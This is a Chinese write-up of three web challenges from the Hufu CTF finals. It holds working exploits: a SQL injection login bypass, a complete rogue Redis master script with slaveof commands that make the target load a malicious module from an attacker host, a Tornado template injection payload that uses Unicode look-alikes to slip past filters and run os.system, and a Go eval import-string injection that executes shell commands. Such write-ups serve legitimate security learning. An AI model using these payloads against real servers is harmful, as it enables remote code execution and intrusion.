虎符决赛


manager

Node.js 的 String.prototype.replace 对替换字符串中的 `$` 有特殊处理(见下方 MDN 链接),可借此绕过对双引号的过滤。
https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/replace#description
然后通过联合查询(union select)让查出来的密码与输入的密码相等即可。

name=$`union select '2','2';--+&password=2

登录之后发现一个可疑的 URL,这是一个 Rocket.Chat 应用,下载之后连接即可。需要在 hosts 文件中把 secret-chat.manager.icq 绑定到题目 IP。


注册登录之后发现有一个 robot,并且可以通过它执行 redis 命令。于是利用恶意 redis 服务器进行主从复制攻击。

config set dir /tmp
config set dbfilename exp.so
slaveof vps port

恶意服务脚本

#!/usr/local/bin python
#coding=utf8
import socket
import time

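# Line terminator used by the RESP wire protocol.
CRLF = "\r\n"
# Name of the file whose bytes are served as the replication "RDB" body.
exp_filename = "exp.so"
# Read the payload once at import time; ``with`` closes the handle immediately
# (the original ``open(...).read()`` never closed it).
with open(exp_filename, "rb") as payload_file:
    payload = payload_file.read()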

def redis_format(arr):
    """Encode a space-separated command string as a RESP multi-bulk array.

    Args:
        arr: the command and its arguments separated by single spaces.
            ``str.split(" ")`` is used, so repeated spaces yield empty
            bulk strings and an empty input yields one empty bulk string.

    Returns:
        The RESP text, e.g. ``"*1\\r\\n$4\\r\\nPING\\r\\n"`` for ``"PING"``.
    """
    global CRLF
    parts = arr.split(" ")
    # One "$<len>CRLF<value>" bulk entry per token, each preceded by CRLF.
    bulks = [CRLF + "$" + str(len(part)) + CRLF + part for part in parts]
    return "*" + str(len(parts)) + "".join(bulks) + CRLF

def redis_connect(rhost, rport):
    """Open a TCP connection to ``rhost:rport`` and return the connected socket.

    The caller owns the returned socket and is responsible for closing it.
    """
    conn = socket.socket()
    conn.connect((rhost, rport))
    return conn

def send(sock, cmd):
    """Send one RESP-encoded command on ``sock`` and print up to 1024 reply bytes.

    Args:
        sock: a connected socket (see ``redis_connect``).
        cmd: the command as a space-separated string, encoded via ``redis_format``.
    """
    wire = redis_format(cmd)
    sock.send(wire)
    reply = sock.recv(1024)
    print(reply.decode("utf-8"))

def RogueServer(lport):
    """Play the master side of a Redis replication handshake on ``lport``.

    Accepts a single inbound connection and answers the replica's handshake
    messages: ``PING`` -> ``+PONG``, ``REPLCONF`` -> ``+OK``, and
    ``PSYNC``/``SYNC`` -> a ``+FULLRESYNC`` line followed by a RESP bulk string
    whose body is ``payload`` (the bytes of ``exp.so`` read at module level)
    in place of an RDB dump; after that reply the loop ends.

    Defensive note: the replica only contacts this server because the target
    Redis accepted ``config set`` and ``slaveof`` from an untrusted client;
    restricting those commands (e.g. Redis ``rename-command``) and alerting on
    ``SLAVEOF``/``REPLICAOF`` towards external hosts removes or exposes that step.

    Args:
        lport: TCP port to bind on all interfaces.

    NOTE(review): ``str`` replies are sent directly, ``"REPLCONF" in data``
    compares ``str`` against the received buffer and ``result.encode()`` is
    followed by ``+= CRLF``; together with the shebang this assumes Python 2
    ``str`` semantics. Neither socket is ever closed, and an empty ``recv``
    (peer gone) would spin the loop forever.
    """
    global CRLF
    global payload
    flag=True
    result=""
    sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.bind(("0.0.0.0",lport))
    sock.listen(10)
    # Only the first connection is served.
    clientSock, address = sock.accept()

    print("\033[92m[+]\033[0m Accepted connection from {}:{}".format(address[0], address[1]))

    while flag:
        data = clientSock.recv(1024)
        print(data)
        if "PING" in data.decode():
            # Simple-string reply; keeps the loop going.
            result="+PONG"+CRLF
            clientSock.send(result)
            flag=True
            print(result)
        elif "REPLCONF" in data:
            # Replica capability/port announcements are acknowledged blindly.
            result="+OK"+CRLF
            clientSock.send(result)
            flag=True
            print(result)
        elif "PSYNC" in data or "SYNC" in data:
            # Fake replication id (40 x "a") and offset 1, then the payload as
            # the bulk-string "RDB" body; this is the last message sent.
            result = "+FULLRESYNC " + "a" * 40 + " 1" + CRLF
            result += "$" + str(len(payload)) + CRLF
            result = result.encode()
            result += payload
            result += CRLF
            clientSock.send(result)
            print("\033[92m[+]\033[0m FULLRESYNC ...")
            flag=False
            #print(result)

    print("\033[92m[+]\033[0m It's done")

if __name__ == "__main__":
    # Listening port; must match the ``slaveof vps port`` line in the write-up.
    lport = 2333
    RogueServer(lport)

执行命令之后读取 flag 即可。

龙卷风

Python 的 tornado 框架 SSTI 注入,但黑名单几乎把可利用的关键字都禁掉了。

# Challenge-side blacklists quoted from the task source. How they are applied
# is not shown here; presumably each entry is matched as a substring of the
# submitted template text — confirm against the challenge code.
# NOTE(review): "while" appears in both black_keyword and black_rce, and "*"
# twice in black_symbol; harmless duplication in the original.
black_func = ['eval', 'os', 'chr', 'class', 'compile', 'dir', 'exec', 'filter', 'attr', 'globals', 'help',
              'input', 'local', 'memoryview', 'open', 'print', 'property', 'reload', 'object', 'reduce', 'repr',
              'method', 'super', "flag", "file", "decode","request","builtins","|","&"]

black_symbol = ["__", "'", '"', "$", "*", ",", ".","\\","0x","0o","/","+","*"]
black_keyword = ['or', 'while']
black_rce = ['render', 'module', 'include','if', 'extends', 'set', 'raw', 'try', 'except', 'else', 'finally',
             'while', 'for', 'from', 'import', 'apply',"True","False"]

发现可以利用 unicode 进行绕过,但是点号和引号当时不知道怎么绕过。赛后学习到可以在 request 请求中携带需要执行的命令,然后利用 eval(repr(request)[x:y]) 从 URL 中截取出命令字符串并交给 eval 执行。

脚本如下,切片的起止位置需要先在本地去掉黑名单调试确定。

#coding: utf-8
import requests

# Mathematical Bold digits and letters, followed by a period look-alike. Python
# normalizes identifiers with NFKC (PEP 3131), so the bold forms parse as their
# ASCII counterparts while the ASCII spellings never appear in the request.
# The final character stands in for "." — presumably chosen as a visual
# look-alike; confirm how the template tokenizer actually treats it.
alphabet_encoded = "𝟎𝟏𝟐𝟑𝟒𝟓𝟔𝟕𝟖𝟗𝐚𝐛𝐜𝐝𝐞𝐟𝐠𝐡𝐢𝐣𝐤𝐥𝐦𝐧𝐨𝐩𝐪𝐫𝐬𝐭𝐮𝐯𝐰𝐱𝐲𝐳𝐀𝐁𝐂𝐃𝐄𝐅𝐆𝐇𝐈𝐉𝐊𝐋𝐌𝐍𝐎𝐏𝐐𝐑𝐒𝐓𝐔𝐕𝐖𝐗𝐘𝐙ꓸ"
alphabet = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ."
# Position-wise ASCII -> bold mapping; both strings must have the same length.
bold_translation = str.maketrans(alphabet, alphabet_encoded)


# Helper output: prints the bold spelling of an expression for manual use.
# payload = "{{RequestHandlerꓸsettings}}"
payload = "eval(repr(request)"
print(payload.translate(bold_translation))


# The actual command, spelled entirely with chr() so no quotes appear in it;
# it is carried in the query string, not in the template itself.
payload = r"__import__('os').system(chr(108)+chr(115)+chr(32)+chr(47)+chr(32)+chr(62)+chr(32)+chr(47)+chr(97)+chr(112)+chr(112)+chr(47)+chr(115)+chr(116)+chr(97)+chr(116)+chr(105)+chr(99)+chr(47)+chr(104)+chr(97)+chr(104)+chr(97)+chr(49)+chr(46)+chr(116)+chr(120)+chr(116))"

# ls / > /app/static/haha1.txt
burp0_url = "http://127.0.0.1:8888/?aaa=" + payload
# Template expression: slice the command back out of repr(request) and eval it.
# 84 is the offset of the "aaa=" value inside repr(request) on the author's
# setup; it has to be re-derived locally (see the write-up above).
burp0_data = {"tornado": "{{𝐞𝐯𝐚𝐥(𝐫𝐞𝐩𝐫(𝐫𝐞𝐪𝐮𝐞𝐬𝐭)[84:"+ str(84 + len(payload)) +"])}}"}
print(burp0_data)
r = requests.post(burp0_url, data=burp0_data)

print(r.text)


readygo

过滤了大小写字母,最后通过 eval.Eval 执行命令。
在 eval.go 源码里 importStr 没有过滤限制,而且只是简单的字符串拼接。所以可以把后面的 func 注释掉,自己写一个 func 来执行命令。
测试代码

package main

import (
"fmt"
"regexp"
eval "github.com/PaulXu-cn/goeval"
)

// main is the local reproduction for the "readygo" task: eval.Eval splices the
// Package string into the generated source by plain concatenation (per the
// write-up), so a crafted import string can close the import list, declare its
// own main and open a block comment that swallows the generated remainder.
// The letter-only regexp guard below inspects only expression, never Package.
func main() {
	// Closes the import parenthesis, defines a main() that runs `ls -l /`, then
	// opens `/*` so whatever goeval appends afterwards is commented out.
	Package := "os/exec\"\n\"fmt\")\nfunc\nmain()\x09{cmd:=exec.Command(\"ls\",\"-l\",\"/\")\nout,_:=cmd.CombinedOutput()\nfmt.Println(string(out))/*"
	// Contains no letters, so it passes the guard; closes the comment opened above.
	expression := "*///"
	// Only expression is filtered — the same gap the write-up points out for importStr.
	match, _ := regexp.MatchString("([a-zA-Z]+)", expression)
	if match {
		fmt.Print("Hacker????")
		return
	} else {
		if res, err := eval.Eval("", "fmt.Print("+expression+")", Package); nil == err {
			fmt.Println(string(res))
		} else {
			fmt.Println("Error")
			fmt.Print(err)
		}
	}
}

